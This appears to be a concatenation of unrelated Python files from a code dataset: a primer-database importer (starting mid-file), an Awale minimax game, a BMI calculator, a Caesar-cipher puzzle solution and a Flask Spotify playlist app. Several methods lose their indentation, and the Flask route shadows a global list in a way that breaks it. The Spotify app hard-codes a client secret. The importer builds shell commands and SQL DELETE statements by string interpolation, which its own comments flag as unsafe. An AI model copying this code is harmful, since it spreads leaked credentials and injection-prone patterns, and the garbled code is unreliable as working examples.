        read_excel keywords (removed in modern pandas in favor of ``usecols``
        and ``sheet_name``) — this module is pinned to an old pandas.

        :param sheetname: sheet data to be extracted from
        :return df_primers_dups: data frame containing extracted data which may include duplicates.
        :return df_primers: data frame containing only data necessary to get genome coordinates.
        """
        df_primers_dups = pd.read_excel(self.excel_file, header=0, parse_cols='A:M, O:X', skiprows=2,
                                        names=['Gene', 'Exon', 'Direction', 'Version', 'Primer_seq', 'Chrom', 'M13_tag',
                                               'Batch', 'project', 'Order_date', 'Frag_size', 'anneal_temp', 'Other',
                                               'snp_check', 'no_snps', 'rs', 'hgvs', 'freq', 'ss', 'ss_proj', 'other2',
                                               'action_to_take', 'check_by'],
                                        sheetname=sheetname, index_col=None)
        to_drop = ['Version', 'M13_tag', 'Batch', 'project', 'Order_date', 'Frag_size', 'anneal_temp', 'Other',
                   'snp_check', 'no_snps', 'rs', 'hgvs', 'freq', 'ss', 'ss_proj', 'other2', 'action_to_take',
                   'check_by']
        df_primers_dups = df_primers_dups.where((pd.notnull(df_primers_dups)), None)  # easier to work with than NaN
        df_primers = df_primers_dups.drop(to_drop, axis=1)
        # One row per unique primer; duplicates arise from repeated orders/batches.
        df_primers = df_primers.drop_duplicates(subset=('Gene', 'Exon', 'Direction', 'Chrom'))
        df_primers = df_primers.reset_index(drop=True)
        return df_primers_dups, df_primers
    def run_pcr(self, csv):
        """Runs virtual PCR on a CSV file using the isPcr and pslToBed tools installed from UCSC.

        NOTE(review): Python 2 file (print statements); commands are built by
        string interpolation into os.system, so *csv* must be a trusted path.
        NOTE(review): the function returns on the FIRST chromosome that yields
        a non-empty psl file, so later chromosomes are never processed — and
        it implicitly returns None when no chromosome matches. Confirm this is
        intended before relying on the return value.

        :param csv: a csv file is need as an input with format "name, forward, reverse".
        :return bedfile: with results of virtual PCR if there is a match.
        """
        print "Running virtual PCR..."
        chromosomes = ['chr1.2bit', 'chr11.2bit', 'chr12.2bit', 'chrX.2bit', 'chr13.2bit', 'chr14.2bit', 'chr15.2bit',
                       'chr16.2bit', 'chr17.2bit', 'chr18.2bit', 'chr19.2bit', 'chr20.2bit', 'chr21.2bit', 'chr22.2bit',
                       'chr2.2bit', 'chr3.2bit', 'chr4.2bit', 'chr5.2bit', 'chr6.2bit', 'chr7.2bit', 'chr8.2bit',
                       'chr9.2bit', 'chr10.2bit', 'chrY.2bit']
        for chr in chromosomes:
            os.system(
                "/opt/kentools/isPcr -out=psl /media/genomicdata/ucsc_hg19_by_chr/2bit_chr/%s \
                %s %s.tmp.psl" % (chr, csv, chr[:-5]))
            pslfile = "%s.tmp.psl" % chr[:-5]
            bedfile = "%s.tmp.bed" % chr[:-5]
            # Only converts a non-empty psl file to a bed file, and removes all psl files in folder.
            if os.path.getsize(pslfile) != 0:
                os.system("/opt/kentools/pslToBed %s %s" % (pslfile, bedfile))
                os.system("rm %s" % pslfile)
                return bedfile
            else:
                os.system("rm %s" % pslfile)
    def get_coords(self, df_primers):
        """Generates csv file for virtual PCR and imports results into a pandas data frame.

        :param df_primers: data frame of primer data.
        :return df_coords: data frame with chromosome, start and end coordinates, and a name
                 (format "Gene_ExonDirection") for each primer.
        """
        primer_list = []
        names_dup = []
        names = []
        exons = []
        dirs = []
        start_coords = []
        end_coords = []
        chroms = []
        seq_position = 0
        list_position = 0
        primer_seqs = pd.DataFrame([])
        csv = '%s.csv' % self.excel_file[:-5]
        csv = csv.replace(" ", "")
        # (1) Gets sequences, exons and directions, splits the sequences into F+R and combines into series and then csv.
        # Rows are assumed to alternate forward/reverse, so [::2]/[1::2] pair them up.
        for row_index, row in df_primers.iterrows():
            primer_list.append(str(row['Primer_seq']))
            names_dup.append(str(row['Gene']) + '_' + str(row['Exon']) + str(row['Direction']))
            exons.append(str(row['Exon']))
            dirs.append(str(row['Direction']))
        for item in names_dup:
            if item not in names:
                names.append(item)
        forwards = primer_list[::2]
        reverses = primer_list[1::2]
        while list_position < len(forwards):
            ser = pd.Series([names[list_position], forwards[list_position], reverses[list_position]])
            primer_seqs = primer_seqs.append(ser, ignore_index=True)
            list_position += 1
        primer_seqs.to_csv(csv, header=None, index=None, sep='\t')
        # (2) Runs virtual PCR on generated csv.
        bedfile = self.run_pcr(csv)
        tool = BedTool(bedfile)
        # (3) Uses results to calculate start and end position of each primer (results give PCR product). Adds to df.
        for row in tool:
            chroms.append(row.chrom)
            start_coords.append(row.start)
            end_coords.append(row.start + len(primer_list[seq_position]))
            chroms.append(row.chrom)
            end_coords.append(row.end)
            start_coords.append(row.end - len(primer_list[seq_position + 1]))
            seq_position += 1
        df_coords = pd.DataFrame([])
        df_coords.insert(0, 'chrom', chroms)
        df_coords.insert(1, 'start', start_coords)
        df_coords.insert(2, 'end', end_coords)
        df_coords.insert(3, 'name', names)
        # (4) Generates a bed file from df_coords (not currently used in application).
        bed = os.path.splitext(bedfile)[0]
        df_coords.to_csv('%s.csv' % bed, header=None, index=None, sep='\t')  # cannot directly convert to bed.
        csv_file = BedTool('%s.csv' % bed)
        csv_file.saveas('%s.bed' % bed)
        df_coords.insert(4, 'Exon', exons)  # not need in bed file so added after.
        df_coords.insert(5, 'Direction', dirs)
        # Removes unnecessary files and moves BED file into shared folder. (add /tests for unit testing)
        # NOTE(review): hard-coded machine-specific paths below.
        os.system("rm /home/cuser/PycharmProjects/django_apps/mysite/%s.csv" % bed)
        os.system("mv /home/cuser/PycharmProjects/django_apps/mysite/%s.bed /media/sf_sarah_share/bedfiles" %
                  bed)
        os.system("rm /home/cuser/PycharmProjects/django_apps/mysite/%s" % csv)
        return df_coords
def col_to_string(self, row):
"""Converts values in the Exon column into string values which makes merging data frames easier.
:param row: for every row in Exon column.
:return string of value.
"""
return str(row['Exon'])
    def combine_coords_primers(self, df_coords, df_primers_dups):
        """Adds primer coordinates to original df_primers_dups data frame.

        NOTE(review): DataFrame.get_value is a long-deprecated pandas API —
        consistent with the legacy pandas this module targets.

        :param df_primers_dups: data frame with primer data from excel.
        :param df_coords: data frame with chrom, start, end, name, exon, direction.
        :return df_combined: data frame of merge between df_coords and df_primers_dups.
        :return gene_name: this will be added to the Genes table and used to check if already in database.
        """
        # Normalize Exon to strings on both sides so the merge keys line up.
        df_coords['Exon'] = df_coords.apply(self.col_to_string, axis=1)
        df_primers_dups['Exon'] = df_primers_dups.apply(self.col_to_string, axis=1)
        # Merge based on Exon and Direction columns
        df_combined = pd.merge(df_primers_dups, df_coords, how='left', on=['Exon', 'Direction'])
        # There is already a Chromosome column in df_primers_dups
        cols_to_drop = ['chrom']
        df_combined = df_combined.drop(cols_to_drop, axis=1)
        # Single-gene spreadsheet: take the gene name from the first row.
        gene_name = df_combined.get_value(0, 'Gene')
        return df_combined, gene_name
def check_in_db(self, gene):
    """Queries the database to check whether a gene is already present.

    :param gene: a gene name to check against the database.
    :return result: the matching row tuple if the gene is already in the
        database, or None if it is not.
    """
    # Parameterised query instead of string interpolation: the old
    # "... LIKE '%s'" % gene form breaks on names containing quotes and
    # is SQL-injectable.
    curs.execute("SELECT Gene FROM Genes WHERE Gene LIKE ?", (gene,))
    result = curs.fetchone()
    return result
def to_db(self, df_combined, gene_name):
    """Creates tables and adds data into the database.

    Modifies the given data frame to populate three tables (Primers, SNPs,
    Genes) and performs data checks.  If data for the gene is already in the
    database it is overridden, and the previous rows are archived to an excel
    document (archived_files) first.

    :param gene_name: gene to check against database.
    :param df_combined: data frame to be inserted into database.
    :return info: description of action performed (for audit log).
    :return archived_filename: filename the previous data is saved under
        (for audit log), or None when nothing was archived.
    """
    # (1) Creates database schema (no-ops when the tables already exist).
    curs.execute("CREATE TABLE IF NOT EXISTS Primers(PrimerId INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, "
                 "Gene TEXT, Exon TEXT, Direction TEXT, Version INTEGER, Primer_Seq TEXT, Chrom TEXT, M13_Tag TEXT"
                 ", Batch TEXT, Project TEXT, Order_date TEXT, Frag_size INTEGER, Anneal_Temp TEXT, Other TEXT, "
                 "snp_check INTEGER, no_snps INTEGER, rs TEXT, hgvs TEXT, freq TEXT, ss TEXT, ss_proj TEXT, "
                 "other2 TEXT, action_to_take TEXT, check_by TEXT, start TEXT, end TEXT, name TEXT)")
    curs.execute("CREATE TABLE IF NOT EXISTS SNPs(SNP_Id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Gene TEXT, "
                 "Exon TEXT, Direction TEXT, snp_check INTEGER, rs TEXT, hgvs TEXT, freq TEXT, ss TEXT, "
                 "ss_proj TEXT, other2 TEXT, action_to_take TEXT, check_by TEXT, name TEXT)")
    curs.execute("CREATE TABLE IF NOT EXISTS Genes(Gene_Id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Gene TEXT)")
    # (2) Drops unnecessary columns to make two tables and removes duplicates.
    primertable_cols_to_drop = ['snp_check', 'rs', 'hgvs', 'freq', 'ss', 'ss_proj', 'other2', 'action_to_take',
                                'check_by']
    snptable_cols_to_drop = ['Exon', 'Direction', 'Version', 'Primer_seq', 'Chrom', 'M13_tag', 'Batch', 'project',
                             'Order_date', 'Frag_size', 'anneal_temp', 'Other', 'no_snps', 'start', 'end']
    df_primertable = df_combined.drop(primertable_cols_to_drop, axis=1)
    df_primertable = df_primertable.drop_duplicates(subset=('Gene', 'Exon', 'Direction', 'Chrom'))
    df_snptable = df_combined.drop(snptable_cols_to_drop, axis=1)
    # (3) Performs data checks using the CheckPrimers class.
    check = CheckPrimers(df_primertable, df_snptable)
    total_errors, error_details = check.check_all()
    # (4) Checks if the gene's data is already in the database.  The string
    # comparison below relies on the Python 2 repr of a one-element unicode
    # tuple matching str(curs.fetchone()).
    uni_gene = '(u\'%s\',)' % gene_name
    gene = self.check_in_db(gene_name)  # this outputs a unicode string
    # (5) Adds to database if no errors. Overrides data if already present.
    archived_filename = None
    if total_errors == 0:
        if str(uni_gene) == str(gene):
            # Gene already present: archive the current rows to excel
            # before deleting them.
            # NOTE(review): SQL here is built by string interpolation —
            # acceptable only for trusted spreadsheet input.
            get_old_query = "SELECT p.Gene, p.Exon, p.Direction, p.Version, p.Primer_seq, p.Chrom, p.M13_Tag, " \
                            "p.Batch, p.Project, p.Order_date, p.Frag_size, p.Anneal_Temp, p.Other, s.snp_check, " \
                            "p.no_snps, s.rs, s.hgvs, s.freq, s.ss, s.ss_proj, s.other2, s.action_to_take, " \
                            "s.check_by FROM SNPs s LEFT JOIN Primers p ON s.name = p.name WHERE p.Gene='%s'" % \
                            gene_name
            today_date = datetime.datetime.now().strftime("%d-%m-%Y_%H%M")
            df_sql = pd.read_sql_query(get_old_query, con=con)
            archived_filename = '%s_%s' % (gene_name, today_date)
            writer = ExcelWriter('%s.xlsx' % archived_filename)
            df_sql.to_excel(writer, '%s' % today_date, index=False)
            writer.save()
            # Move the archive into the shared archived_files folder.
            os.system("mv /home/cuser/PycharmProjects/django_apps/mysite/%s.xlsx "
                      "/home/cuser/PycharmProjects/django_apps/mysite/primerdb/archived_files/" % archived_filename)
            curs.execute("DELETE FROM Primers WHERE Gene='%s'" % gene_name)
            curs.execute("DELETE FROM Genes WHERE Gene='%s'" % gene_name)
            curs.execute("DELETE FROM SNPs WHERE Gene='%s'" % gene_name)
            info = "Data updated."
        else:
            info = "New gene added."
        # Insert new data into SQL tables.
        curs.execute("INSERT INTO Genes (Gene) VALUES (?)", (gene_name,))
        df_primertable.to_sql('Primers', con, if_exists='append', index=False)
        df_snptable.to_sql('SNPs', con, if_exists='append', index=False)
        # Python 2 print statement — this module predates Python 3.
        print "Primers successfully added to database."
    else:
        # Data checks failed: nothing is written; report the errors.
        info = error_details
    con.commit()
    return info, archived_filename
def all(self):
    """Run the full import pipeline: read the sheet, look up primer
    coordinates, merge, and write everything to the database.

    :return info: description of the action performed (for the audit log).
    :return archived_filename: name any previous data was archived under.
    """
    sheet = self.get_sheet_name()
    primers_with_dups, primers = self.get_primers(sheet)
    coords = self.get_coords(primers)
    merged, gene_name = self.combine_coords_primers(coords, primers_with_dups)
    return self.to_db(merged, gene_name)
|
9,592 | 576d6bec4a91ba6f0597b76a5da5ad3ef6562b19 | import numpy as np
#!pip install pygame
import pygame
#from copy import deepcopy
pygame.init()
#-----------
# Modifications (Matthieu, 15/04):
# Modification de la représentation du terrain du jeu. Il est maintenant représenté par une seule liste.
# un seul identifiant par coupe semble plus simple à gérer qu'un couple (joueur,numero)
# Les indices de la liste correspondant à chaque coupe sont par exemple :
# [11] [10] [9] [8] [7] [6] ligne de l'ordi (joueur 1)
# [0] [1] [2] [3] [4] [5] ligne du joueur (joueur 0)
# Modifications de certaines fonctions de vérification des règles pour éviter les deepcopy
# Simplification de la structure de l'arbre (structure de dictionnaire contenant les fils de chaque noeud)
# On ne le construit que pour une profondeur donnée profondeurArbre (1 par défaut), ou même pas du tout
# Algo alpha beta
# Pbs :
# Fonction qui permettrait de détecter les situations ou le jeu peut boucler à l'infini
# Pouvoir tester les performances de l'ia, par exemple sur quelques centaines de parties, combien de %
# sont gagnées par l'ia contre un algo qui joue aléatoirement
# Améliorer la fonction d'évaluation qui est pour l'instant très basique
##-------------
# Le terrain de jeu est un tableau de deux lignes (les deux camps) et de nCoupes colonnes (les coupelles),
# contenant initialement n graines. La première constitue le camp du joueur, la seconde, celle de l'ordinateur.
# Dans chaque camp, les coupelles sont numérotées de 1 à nCoupes.
# A chaque tour, le joueur doit choisir un numéro de coupelle.
# Les graines de celle-ci sont alors transférées dans les coupes suivantes etc.
#
# modifs du 17.03 par Léo:
# -suppression de scoreGagnant, qui n'apparait pas dans les règles de base de l'Awalé
# -Pour faciliter les manipulations du code et sa compréhension, on parle maintenant
# du joueur 0 et du joueur 1 (au lieu de 1 et 2) et les coupelles sont numérotées de 0 à nCoupes-1.
#Notions de classe:
#https://openclassrooms.com/fr/courses/235344-apprenez-a-programmer-en-python/232721-apprehendez-les-classes
#Explication de l'algorithme minimax général (page 52) :
#http://stephane.ayache.perso.luminy.univ-amu.fr/zoom/cours/Cours/IA_Jeux/IAEtJeux2.pdf
#Code par Léo et Paul
#Pb: le jeu peut boucler à l'infini à la fin d'une partie (souvent lorsqu'il reste 2 graines disposées symétriquement)
# -> se pencher sur la fonction "partieFinie" et peut-être essayer d'intégrer cette fonction dans l'algo récursif minimax..
#Pb: structure d'arbre trop compliquée: (*)
#l'arbre est construit à partir d'une liste selon le principe suivant:
#les nCoupes fils de l'élément d'indice k sont d'indices k*nCoupes + l, avec l variant entre 1 et nCoupes
#On vérifie alors (à l'aide d'un dessin par exemple) qu'il y a une bijection naturelle entre la structure d'arbre et la liste (ou tableau) de taille voulue
class terrainDeJeu:
    """Awale (oware) board: game state, rules, and the computer's
    minimax / alpha-beta search.

    Board layout, as indices into the flat `plateau` array:
        [11] [10] [9] [8] [7] [6]   computer's row (player 1)
        [0]  [1]  [2]  [3] [4] [5]  human's row (player 0)
    Cups are walked counter-clockwise, i.e. by increasing index modulo
    2*nCoupes.
    """

    def __init__(self,nCoupes,profondeur,nGrainesParCoupelle=4) :
        # One flat array for both rows; every cup starts with the same
        # number of seeds.
        self.plateau = np.full(2*nCoupes,nGrainesParCoupelle)
        self.nGrainesParCoupelleInit = nGrainesParCoupelle
        self.nCoupes = nCoupes
        self.scores = [0,0]  # scores[0] = player 0's captures, scores[1] = player 1's
        self.tour = 0  # whose turn it is: 0 = human, 1 = computer
        self.finie = False  # True once the game is over
        self.profondeurMinimax = profondeur  # search depth for minimax/alpha-beta
        self.arbreFils = {}  # game-tree children of this node: {cup id: cloned board}

    def clone(self):
        """Return an independent copy of the board, used to simulate a
        move without touching the real game state (avoids deepcopy)."""
        clone = terrainDeJeu(self.nCoupes,self.profondeurMinimax,self.nGrainesParCoupelleInit)
        clone.plateau= self.plateau.copy()
        clone.scores = self.scores.copy()
        clone.tour = self.tour
        clone.finie = self.finie
        return clone

    def coupeSuivante(self,idCoupe):
        """Id of the cup after idCoupe (counter-clockwise direction)."""
        return (idCoupe + 1)%(2*self.nCoupes)

    def coupePrecedente(self,idCoupe):
        """Id of the cup before idCoupe (clockwise direction)."""
        return (idCoupe - 1)%(2*self.nCoupes)

    def joueurCoupe(self,idCoupe):
        """Owner (0 or 1) of cup idCoupe."""
        return 0 if idCoupe < self.nCoupes else 1

    def coupePrenable(self,idCoupe):
        """True if cup idCoupe can be captured (holds 2 or 3 seeds)."""
        return (self.plateau[idCoupe]==2 or self.plateau[idCoupe]==3)

    def deplacer(self,joueur,idCoupe):
        """Play cup idCoupe for `joueur`: sow its seeds counter-clockwise
        (skipping the emptied cup), apply captures backwards from the
        landing cup when the rules allow it, then pass the turn."""
        coupeInitiale = idCoupe  # id of the chosen cup
        nGraines = self.plateau[idCoupe]
        self.plateau[idCoupe] = 0
        while (nGraines != 0):  # redistribute the seeds of the chosen cup
            idCoupe = self.coupeSuivante(idCoupe)
            if (idCoupe != coupeInitiale):  # never sow back into the cup just emptied
                self.plateau[idCoupe] += 1
                nGraines -= 1
        coupeFinale = idCoupe
        joueurCoupeFinale = self.joueurCoupe(coupeFinale)
        # Captures only happen when the last seed lands in the opponent's row.
        if (joueur != joueurCoupeFinale):
            # Check whether capturing would starve the opponent; if not,
            # capture the chain of 2/3-seed cups walking clockwise.
            if (self.nourrirAdversaire(joueur,coupeFinale)):
                while (self.joueurCoupe(idCoupe)==joueurCoupeFinale and self.coupePrenable(idCoupe)):
                    self.scores[joueur]+=self.plateau[idCoupe]
                    self.plateau[idCoupe]=0
                    idCoupe = self.coupePrecedente(idCoupe)
            # Otherwise (the move would starve the opponent): take nothing.
        self.tour=(self.tour+1)%2

    def grainesRestantes(self):
        """Total number of seeds still on the board."""
        return np.sum(self.plateau)

    def grainesRestantesJoueur(self,joueur):
        """Number of seeds left in `joueur`'s own row."""
        if joueur==0:
            return np.sum(self.plateau[0:self.nCoupes])
        else:
            return np.sum(self.plateau[self.nCoupes:len(self.plateau)])

    def nourrirAdversaire(self,joueur,coupeFinale):
        """Return True when a move by `joueur` ending on coupeFinale
        leaves the opponent with at least one seed after captures (the
        'feed your opponent' rule), i.e. when the capture is admissible."""
        adversaire = (joueur+1)%2
        # Start from the opponent's cup furthest along the sowing
        # direction and walk their row clockwise.
        admissible = False
        idCoupe = (self.nCoupes*(adversaire+1))-1
        while (self.joueurCoupe(idCoupe)==adversaire):
            # A non-empty cup past the landing cup cannot be part of the
            # capture chain, so the opponent keeps at least one seed.
            if (idCoupe>coupeFinale and self.plateau[idCoupe]!=0):
                admissible=True
            # A cup that cannot be captured (seed count not 2 or 3)
            # breaks the capture chain and also makes the move admissible.
            elif (not self.coupePrenable(idCoupe)):
                admissible=True
            idCoupe=self.coupePrecedente(idCoupe)
        # True when the move is admissible under the "feeding" rule.
        return admissible

    def coupesAdmissiblesNourrir(self,joueur):
        """Cups `joueur` may play when the opponent's row is empty: only
        moves holding enough seeds to reach the opponent's row qualify."""
        coupesAdmissibles = []
        # Start with the cup closest to the opponent (counter-clockwise).
        idCoupe = (self.nCoupes*(joueur+1))-1
        distance = 1
        while (self.joueurCoupe(idCoupe)==joueur):
            # With at least `distance` seeds, at least one seed lands in
            # the opponent's row.
            if self.plateau[idCoupe]>=distance:
                coupesAdmissibles.append(idCoupe)
            idCoupe = self.coupePrecedente(idCoupe)
            distance +=1
        return coupesAdmissibles

    def coupesAdmissibles(self,joueur):
        """All cups `joueur` may legally play this turn.

        Side effect: when the opponent is starved and no feeding move
        exists, the remaining seeds are awarded to `joueur`, the board is
        cleared and the game is flagged finished (empty list returned)."""
        adversaire = (joueur+1)%2
        if self.grainesRestantesJoueur(adversaire) == 0:
            # Opponent has no seeds: only feeding moves are admissible.
            coupesAdmissibles = self.coupesAdmissiblesNourrir(joueur)
            if len(coupesAdmissibles)==0:
                # No way to feed the opponent: game over, current player
                # collects everything left on the board.
                self.scores[joueur] += self.grainesRestantes()
                self.plateau = np.zeros(2*self.nCoupes,dtype=int)
                self.finie = True
        # Otherwise every non-empty cup of `joueur` is admissible.
        else :
            coupesAdmissibles = [(k+joueur*self.nCoupes) for k in range(self.nCoupes) if self.plateau[(k+joueur*self.nCoupes)]>0]
        return coupesAdmissibles

    def tourDuJoueur(self):
        """Prompt the human (player 0) for a cup, validate it against the
        admissible moves, play it, then hand control back to jouer()."""
        joueur = 0
        # If the opponent has no seeds left, feeding them is mandatory;
        # coupesAdmissibles() handles that (and may end the game).
        coupesAdmissibles = self.coupesAdmissibles(joueur)
        print("C'est au tour du joueur 1. Entrez le numéro de la coupelle à jouer:")
        nCoupe = int(input())
        while nCoupe<0 or nCoupe>self.nCoupes-1 or (not (nCoupe in coupesAdmissibles)):
            # Cup does not exist or is not an admissible move.
            print("Coupelle incorrecte. Entrez le numéro de la coupelle à jouer.")
            nCoupe = int(input())
        self.deplacer(joueur,nCoupe)
        self.jouer()

    def tourOrdi(self):
        """Computer's turn (player 1): run alpha-beta from the current
        position, then play the first root move whose value matches the
        root value."""
        joueur = 1
        self.profondeur = 0  # current depth; incremented on cloned children
        self.value = self.alphabeta(joueur,-np.inf,np.inf)
        for idCoupe in self.arbreFils.keys():
            print("coupe = ",idCoupe," : valeur = ",self.arbreFils[idCoupe].value)
        for idCoupe in self.arbreFils.keys():
            if self.value==self.arbreFils[idCoupe].value:
                self.deplacer(joueur,idCoupe)
                break
        self.jouer()

    def partieFinie(self):
        """Update and return self.finie: the game ends when the board is
        empty or one player has captured more than half of all seeds."""
        limiteGagne = self.nCoupes*self.nGrainesParCoupelleInit
        self.finie = (self.grainesRestantes()==0 or self.scores[0]> limiteGagne or self.scores[1]> limiteGagne)
        return self.finie

    def afficherPlateau(self):
        """Print the board, computer's row on top ([::-1] reverses it so
        the counter-clockwise cup order reads naturally)."""
        print(np.array([self.plateau[self.nCoupes:len(self.plateau)][::-1],self.plateau[0:self.nCoupes]]))

    def afficherScores(self):
        """Print both players' captured-seed counts."""
        print("score J1........."+str(self.scores[0]))
        print("score MinMax....."+str(self.scores[1]))

    def evaluation(self,joueur):
        """Leaf evaluation: captured-seed difference from `joueur`'s
        point of view (admittedly basic, per the header notes)."""
        adversaire = (joueur+1)%2
        return self.scores[joueur]-self.scores[adversaire]

    def jouer(self):
        """Main loop: display the position and give the hand to whichever
        player is to move, until partieFinie() reports the game is over."""
        if (not self.partieFinie()) :
            self.afficherPlateau()
            self.afficherScores()
            if (self.tour==0):
                self.tourDuJoueur()
            else:
                self.tourOrdi()
            print("\n")
        else:
            self.afficherPlateau()
            self.afficherScores()
            print("Partie Finie !")

    # No longer really used: alphabeta() below supersedes this plain minimax.
    def minimax(self, joueurMaximisant, profondeurArbre=1): #joueurMaximisant = player whose score we maximise (0 or 1)
        """Plain minimax: recursively simulate future positions down to
        self.profondeurMinimax plies and back up the evaluation."""
        self.arbreFils = {}
        # Determine the possible moves; if none exist this call also
        # ends the game (see coupesAdmissibles).
        coupesPossibles = self.coupesAdmissibles(self.tour)
        if (self.profondeur == self.profondeurMinimax or self.finie):  # base case
            self.value = self.evaluation(joueurMaximisant)
            return self.value
        if self.tour==joueurMaximisant:
            fctComparaison = max
            self.value = - np.inf
        else:
            fctComparaison = min
            self.value = np.inf
        # Explore every possible move on a cloned board.
        for idCoupe in coupesPossibles:
            fils=self.clone()
            fils.profondeur=self.profondeur+1
            fils.deplacer(fils.tour,idCoupe)
            fils.value = fils.minimax(joueurMaximisant)
            # Only materialise the tree (arbreFils) above profondeurArbre;
            # depth 1 is enough to display the value of each root move.
            if (self.profondeur < profondeurArbre):
                self.arbreFils[idCoupe]=fils
            self.value = fctComparaison(self.value, fils.value)
        return self.value

    def alphabeta(self, joueurMaximisant, alpha, beta, profondeurArbre=1): #joueurMaximisant = player whose score we maximise (0 or 1)
        """Minimax with alpha-beta pruning: same recursion as minimax(),
        but branches that cannot change the result are cut off early."""
        self.arbreFils = {}
        # Determine the possible moves; if none exist this call also
        # ends the game (see coupesAdmissibles).
        coupesPossibles = self.coupesAdmissibles(self.tour)
        if (self.profondeur == self.profondeurMinimax or self.finie):  # base case
            self.value = self.evaluation(joueurMaximisant)
            return self.value
        if self.tour==joueurMaximisant:
            fctComparaison = max
            self.value = - np.inf
        else:
            fctComparaison = min
            self.value = np.inf
        # Explore every possible move on a cloned board.
        for idCoupe in coupesPossibles:
            fils=self.clone()
            fils.profondeur=self.profondeur+1
            fils.deplacer(fils.tour,idCoupe)
            fils.value = fils.alphabeta(joueurMaximisant,alpha,beta)
            # Only materialise the tree (arbreFils) above profondeurArbre;
            # depth 1 is enough to display the value of each root move.
            if (self.profondeur < profondeurArbre):
                self.arbreFils[idCoupe]=fils
            self.value = fctComparaison(self.value, fils.value)
            # Alpha / beta cut-offs once the best achievable result here
            # cannot influence the parent's choice.
            if self.tour==joueurMaximisant:
                if self.value >= beta:
                    return self.value
                alpha = fctComparaison(alpha,self.value)
            else:
                if alpha >= self.value:
                    return self.value
                beta = fctComparaison(beta,self.value)
        return self.value
# Launch an interactive game: 6 cups per side, 4 seeds per cup, and an
# alpha-beta search depth of 8 for the computer player.
t = terrainDeJeu(nCoupes=6, nGrainesParCoupelle=4, profondeur=8)
t.jouer()
# aylat
# This program will calculate an individual's body mass index (BMI),
# based on their height and their weight.


def calculate_bmi(weight_pounds, height_inches):
    """Return the BMI for a weight in pounds and a height in inches."""
    return weight_pounds * 703 / height_inches ** 2


def weight_category(bmi):
    """Return the standard weight-category label for a BMI value.

    The original chain compared against 24.9 and 29.9, which mislabelled
    BMIs in [24.9, 25) and [29.9, 30); the standard cut-offs are 18.5,
    25 and 30.
    """
    if bmi < 18.5:
        return 'underweight'
    elif bmi < 25:
        return 'ideal'
    elif bmi < 30:
        return 'overweight'
    return 'obese'


def main():
    """Prompt for name, weight and height, then report the BMI category."""
    name = input('Enter your full name: ')
    weight = float(input('Enter your weight in pounds: '))
    height = float(input('Enter your height in inches: '))
    # Perform BMI calculation, based on user input.
    bmi = calculate_bmi(weight, height)
    print('\n')
    print(name, ", your BMI calculation is ", format(bmi, '.1f'),
          ", which indicates your weight category is ", weight_category(bmi),
          ".", sep='')


if __name__ == '__main__':
    main()
|
"""
Python Challenge - Level 1 - What about making trans?

Each letter of the cypher text is shifted two places forward in the
alphabet (a Caesar cipher).  The decoded message says to apply the same
translation to the page name in the URL: 'map' -> 'ocr'.
"""
import string

SHIFT = 2
INPUT_TEXT = string.ascii_lowercase  # abcdefghijklmnopqrstuvwxyz
# Rotate the alphabet left by SHIFT positions: cdefghijklmnopqrstuvwxyzab
OUTPUT_TEXT = ''.join(INPUT_TEXT[(i + SHIFT) % len(INPUT_TEXT)]
                      for i in range(len(INPUT_TEXT)))
TRANSLATION_TABLE = str.maketrans(INPUT_TEXT, OUTPUT_TEXT)
CYPHER_TEXT = """g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr \
amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw \
rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu \
ynnjw ml rfc spj."""
# CYPHER_TEXT.translate(TRANSLATION_TABLE) and 'map'.translate(...) both
# point at the next level:
print('http://www.pythonchallenge.com/pc/def/ocr.html')
|
9,595 | 4f674b30c919c7ec72c11a8edd9692c91da7cb90 | import json
import spotipy
import spotipy.util as util
from spotipy.oauth2 import SpotifyClientCredentials
from flask import abort, Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from helpers import login_required
# Configure application
app = Flask(__name__)

# Spotify API credentials.
# NOTE(review): secrets are hard-coded in source; they should be loaded
# from environment variables or a config file kept out of version control.
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'

# Ensure responses aren't cached while debugging.
if app.config["DEBUG"]:
    @app.after_request
    def after_request(response):
        response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
        response.headers["Expires"] = 0
        response.headers["Pragma"] = "no-cache"
        return response

# Configure session to use filesystem (instead of signed cookies).
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)

# Module-level pool of track ids gathered from all connected users;
# shared across requests (single-process assumption).
tracks = []
# retrieve top tracks from newly connected user
@app.route("/tracks", methods = ["POST"])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
# Main page. Runs playlist generation and displays the embedded playlist.
@app.route("/")
@login_required
def index():
username = session["username"]
# host has already logged in and playlist is already made
if session.get("token") and session.get("playlist_dict"):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session["token"])
playlist = sp.user_playlist_add_tracks(username, session["playlist_dict"]['id'], group_playlist) # add to the playlist
return render_template("index.html", playlist_url=session["playlist_dict"]['uri'])
token = util.prompt_for_user_token(username,'playlist-modify-public user-top-read', client_id=client_id,client_secret=client_secret,redirect_uri='http://127.0.0.1')
if token:
session["token"] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0, time_range='medium_term') # get the hosts top tracks
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, "Group Playlist")
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id, group_playlist) # playlist is now populated
else:
print("Can't get token for " + username)
url = "https://open.spotify.com/embed?uri=" + playlist_dict['uri']
session["playlist_url"] = playlist_dict['uri']
return render_template("index.html", playlist_url=url)
@app.route("/login", methods=["GET", "POST"])
def login():
    """Log user in: store the submitted username in the session and reset
    the shared track pool for a fresh group session."""

    # Forget any previous session state.
    session.clear()

    # Reset the shared track pool in place.  The previous `tracks = []`
    # only rebound a function-local name and left the module-level list
